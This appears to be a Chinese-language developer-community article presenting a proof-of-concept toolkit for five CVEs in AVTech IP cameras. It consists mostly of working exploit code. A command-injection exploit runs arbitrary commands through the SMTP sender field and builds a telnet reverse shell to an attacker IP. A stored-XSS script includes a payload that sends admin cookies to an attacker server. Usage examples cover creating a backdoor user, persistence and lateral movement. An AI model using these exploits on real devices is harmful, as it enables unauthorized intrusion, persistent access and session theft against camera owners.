
AVTech PoCs 是一个专门针对AVTech IP摄像机中多个已发现漏洞的概念验证(Proof of Concept)工具集合。该项目实现了对CVE-2025-57199、CVE-2025-57200、CVE-2025-57201、CVE-2025-57202和CVE-2025-57203的利用,通过自动化脚本演示了这些安全漏洞的实际危害。
核心价值在于为安全研究人员和渗透测试人员提供了一套完整的测试工具,用于验证AVTech IP摄像机的安全性,提高对物联网设备安全威胁的认识。
# 安装必要的Python依赖
pip install requests
# 克隆项目
git clone <repository-url>
cd avtech-pocs无需特殊配置,确保Python环境正确设置即可。
python exploit_smtp.py --target-ip 192.168.1.100 --username admin --password admin --command "id"python exploit_ftp.py --target-ip 192.168.1.100 --username admin --password admin --command "uname -a"# 在攻击机上启动监听
nc -lvp 4444
# 执行反向Shell攻击
python exploit_smtp.py --target-ip 192.168.1.100 --username admin --password admin --attacker-ip 192.168.1.50 --attacker-port 4444 --reverse-shell# 在攻击机上启动HTTP服务监听
python -m http.server 8080
# 执行XSS攻击
python exploit_xss.py --target-ip 192.168.1.100 --username admin --password admin --attacker-ip 192.168.1.50 --attacker-port 8080场景1:安全评估验证
# 验证设备是否存在SMTP注入漏洞
python exploit_smtp.py -t 192.168.1.100 -U admin -P admin -c "echo 'Vulnerable!' > /tmp/test.txt"场景2:权限维持
# 通过SMB配置注入创建后门用户
python exploit_smb.py -t 192.168.1.100 -c "useradd -r -s /bin/bash backdoor"场景3:横向移动
# 使用XSS窃取管理员cookie,实现权限提升
python exploit_xss.py --target-ip 192.168.1.100 --attacker-ip 10.0.0.5 --attacker-port 9000项目核心是DGM1104类,提供以下主要方法:
login(username, password): 设备认证get_ftp_fields(): 获取FTP配置get_smtp_fields(): 获取SMTP配置 get_smb_fields(): 获取SMB配置get_network_failure_fields(): 获取网络故障检测配置set_config_fields(config_values): 设置配置参数execute_ftp_test(): 触发FTP测试execute_smtp_test(): 触发SMTP测试add_user(username, password): 添加用户(用于XSS攻击)import random
from base64 import b64encode
from copy import deepcopy
from requests import ReadTimeout, Session, Response
from typing import Dict, List, Optional
from urllib.parse import quote
import logging
class DGM1104:
CONFIG_PATH: str = "/cgi-bin/user/Config.cgi"
PWDGRP_PATH: str = "/cgi-bin/supervisor/PwdGrp.cgi"
def __init__(self, hostname: str, port: int = 88, https: bool = False) -> None:
self.session = Session()
protocol: str = 'https' if https else 'http'
self.base_url: str = f'{protocol}://{hostname}:{port}'
def login(self, username: str, password: str) -> bool:
"""设备登录认证
Args:
username: 用户名
password: 密码
Returns:
登录是否成功
"""
account_string: str = f"{username}:{password}"
account_string_b64: str = b64encode(account_string.encode()).decode()
random_float: float = random.random()
verify_path: str = f"/cgi-bin/nobody/VerifyCode.cgi?account={account_string_b64}&rnd={random_float}"
url: str = self.base_url + verify_path
response: Response = self.session.get(url)
login_successful: bool = (
response.status_code == 200 and
len(self.session.cookies) >= 1
)
return login_successful
def get_config_category(self, category: str = "Network.FTP") -> Optional[Dict[str, str]]:
"""获取指定配置类别的所有字段
Args:
category: 配置类别路径
Returns:
配置字典或None(失败时)
"""
url: str = self.base_url + self.CONFIG_PATH
data: Dict[str, str] = {
"action": "get",
"category": f"{category}.*"
}
try:
response: Response = self.session.post(url=url, data=data)
response_lines: List[str] = response.text.split('\n')[2:]
if len(response_lines) <= 2:
return None
config_values: Dict[str, str] = {}
for line in response_lines:
first_equals_index = line.find('=')
if first_equals_index == -1:
continue
key: str = line[:first_equals_index]
value: str = line[first_equals_index+1:]
config_values[key] = value
return config_values
except Exception as e:
logging.error(f"Failed to get config category {category}: {e}")
return Noneimport argparse
import json
import logging
import sys
from copy import deepcopy
from typing import Dict, Optional
from dgm1104 import DGM1104
EXIT_FAILURE: int = 1
EXIT_SUCCESS: int = 0
def exploit(
target_ip: str,
target_port: int,
username: str,
password: str,
command: str,
) -> bool:
"""执行SMTP配置命令注入攻击
Args:
target_ip: 目标设备IP
target_port: 目标设备端口
username: 认证用户名
password: 认证密码
command: 要执行的命令
Returns:
攻击是否成功
"""
# 初始化设备连接
device: DGM1104 = DGM1104(
hostname=target_ip,
port=target_port,
)
# 登录设备
logged_in:bool = device.login(
username=username,
password=password,
)
if not logged_in:
logging.error("[!] Failed to log into device.")
return False
logging.info("[+] Logged into device successfully.")
# 获取原始SMTP配置
original_smtp_fields: Optional[Dict[str, str]] = device.get_smtp_fields()
if original_smtp_fields is None:
logging.error("[!] Failed to get original SMTP fields")
return False
# 打印原始配置(调试信息)
original_smtp_fields_json_str: str = json.dumps(
original_smtp_fields,
indent=4,
)
logging.debug(
"[+] Retrieved Original SMTP Fields:\n" +
original_smtp_fields_json_str
)
# 构造恶意配置(命令注入)
new_smtp_fields: Dict[str, str] = deepcopy(original_smtp_fields)
new_smtp_fields["Network.SMTP.Sender"] = f"`{command}`"
# 设置恶意配置
smtp_fields_set: bool = device.set_config_fields(
config_values=new_smtp_fields,
)
if not smtp_fields_set:
logging.error("[!] Failed to set SMTP fields")
return False
logging.debug("[+] Set SMTP sender field with poisoned value.")
# 触发SMTP测试,执行命令
smtp_test_executed: bool = device.execute_smtp_test()
if not smtp_test_executed:
logging.error("[!] Failed to execute SMTP test.")
return False
logging.info("[+] Command Executed!")
return True
def reverse_shell(
target_ip: str,
target_port: int,
username: str,
password:str,
attacker_ip: str,
attacker_port: int,
) -> bool:
"""建立反向Shell连接
Args:
target_ip: 目标设备IP
target_port: 目标设备端口
username: 认证用户名
password: 认证密码
attacker_ip: 攻击者IP
attacker_port: 攻击者监听端口
Returns:
反向Shell是否成功建立
"""
# 构造反向Shell命令
reverse_shell_command: str = (
"TF=$(mktemp -u);mkfifo $TF && telnet " +
attacker_ip +
" " +
str(attacker_port) +
" 0<$TF | sh 1>$TF"
)
# 使用SMTP注入执行反向Shell命令
return exploit(
target_ip=target_ip,
target_port=target_port,
username=username,
password=password,
command=reverse_shell_command,
)import argparse
import sys
from typing import Optional
from dgm1104 import DGM1104
EXIT_FAILURE: int = 1
EXIT_SUCCESS: int = 0
# 默认XSS Payload:简单的JavaScript弹窗
DEFAULT_PAYLOAD: str = '<img src=x onerror="print()" />'
def exploit(
target_ip: str,
target_port: int,
username: str,
password: str,
payload: str,
) -> bool:
"""执行存储型XSS攻击
Args:
target_ip: 目标设备IP
target_port: 目标设备端口
username: 认证用户名
password: 认证密码
payload: XSS攻击载荷
Returns:
攻击是否成功
"""
# 初始化设备连接
device: DGM1104 = DGM1104(
hostname=target_ip,
port=target_port,
)
# 登录设备
logged_in:bool = device.login(
username=username,
password=password,
)
if not logged_in:
print("[!] Failed to log into device.")
return False
print("[+] Logged into device successfully.")
# 添加恶意用户(用户名为XSS Payload)
user_added: bool = device.add_user(
username=payload,
password="password"
)
if not user_added:
print("[!] Failed to add user!")
return False
print(f"[+] Set created a user account with {payload} payload as username.")
print(f"[*] Either visit the accounts page to trigger the payload, or wait for another user to.")
return True
def generate_xss_cookie_payload(ip: str, port: str) -> str:
"""生成Cookie窃取XSS Payload
Args:
ip: 攻击者服务器IP
port: 攻击者服务器端口
Returns:
构造好的XSS Payload
"""
return f"""<img src=x onerror="this.src='http://{ip}:{port}/?'+document.cookie; this.removeAttribute('onerror');">"""这些核心代码展示了项目的技术实现细节,包括设备交互、漏洞利用逻辑和攻击载荷构造。代码结构清晰,注释详细,便于安全研究人员理解和修改。
6HFtX5dABrKlqXeO5PUv//BvmoPhYvgx1TRcZLWgRyY=
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。